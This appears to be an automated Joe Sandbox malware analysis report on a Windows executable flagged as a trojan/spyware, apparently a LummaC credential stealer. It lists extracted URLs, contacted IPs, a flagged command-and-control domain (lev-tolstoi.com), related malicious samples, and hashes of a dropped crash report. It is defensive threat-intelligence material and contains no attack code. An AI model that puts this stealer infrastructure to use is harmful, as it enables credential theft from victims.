                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://store.steampowered.com/steam_refunds/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://x1.c.lencr.org/05Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://x1.i.lencr.org/05Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319005Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620165Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://steamcommunity.com/workshop/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://login.steampowered.com/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.all5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://store.steampowered.com/legal/5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://www.mozilla.or5Z19n7XRT1.exe, 00000000.00000003.2293872198.0000000003060000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://lev-tolstoi.com/.co.jp5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://recaptcha.net5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                104.21.66.86
                                                                                                                                                                                                                                		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                172.67.157.254
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                23.55.153.106
                                                                                                                                                                                                                                		steamcommunity.comUnited States
                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1581620
                                                                                                                                                                                                                                Start date and time:2024-12-28 09:57:59 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 5m 26s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:5Z19n7XRT1.exe
                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                Original Sample Name:fb4f1803fbfc70bc55b61bf418d52d3d.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@2/5@11/3
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 97%
                                                                                                                                                                                                                                • Number of executed functions: 23
                                                                                                                                                                                                                                • Number of non-executed functions: 228
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.107.246.63, 52.149.20.212, 20.231.128.67
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: 5Z19n7XRT1.exe

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                03:58:53API Interceptor14x Sleep call for process: 5Z19n7XRT1.exe modified
                                                                                                                                                                                                                                03:59:16API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                172.67.157.254TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          k7T6akLcAr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    23.55.153.106TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      FfcoO2Giru.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        lev-tolstoi.comTdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        k7T6akLcAr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        steamcommunity.comTdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        AKAMAI-ASN1EUTdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        CLOUDFLARENETUSTdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        CLOUDFLARENETUSTdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        FLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3

                                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        3LUyRfIoKs.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        2S6U7zz1Jg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        H1iOI9vWfh.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        FfcoO2Giru.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5Z19n7XRT1.exe_36299fba1c6c9330cf659a924b23b5aee9f6a_0d922fe4_549f35ac-3fe3-4aaa-9093-9863e73eb5c1\Report.wer

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0599118016320659
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:xuwY5Wu0pluKQju3mFizuiFiZ24IO8bx:xw5UpluKQjLizuiFiY4IO8b
                                                                                                                                                                                                                                                                        MD5:65FC3798FDB7DBC085E083B39815D72E
                                                                                                                                                                                                                                                                        SHA1:A51361ED5C45FC2741F141A7B8EFD57DB7A68D3C
                                                                                                                                                                                                                                                                        SHA-256:A9A40F3AFA7ED3BA5656B7BE606D8D4D58E141BB6492CBAE8C44584D2A69DF5D
                                                                                                                                                                                                                                                                        SHA-512:850F19C626931221FD8AE31AD49995BC2C9EC683CC7A535ADEA771069B6D88A89D408E8C6BB1C514AEF6DA6BF3672AF2ED10E8AF007C9363846CE00DE2721E1B
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:low
